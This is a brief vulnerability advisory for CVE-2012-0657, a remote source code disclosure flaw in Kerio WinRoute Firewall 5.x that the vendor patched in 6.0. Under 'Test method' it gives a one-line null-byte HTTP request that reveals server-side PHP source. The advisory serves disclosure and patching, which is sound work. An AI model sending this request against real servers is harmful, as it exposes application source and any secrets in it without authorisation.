Release date: 2012-05-10
Updated on:
Affected Systems:
Kerio WinRoute Firewall 5.x
Unaffected Systems:
Kerio WinRoute Firewall 6.0
Description:
--------------------------------------------------------------------------------
Bugtraq ID: 53460
CVE ID: CVE-2012-0657
Kerio WinRoute Firewall is a popular firewall software system.
A remote source code disclosure vulnerability exists in Kerio WinRoute Firewall versions earlier than 6.0.0. Attackers can exploit this vulnerability to view the source code of files that the server processes.
<* Source: Andrey Komarov
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
GET /nonauth/login.phpNULL_BYTE.txt HTTP/1.1
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Kerio
-----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.kerio.com/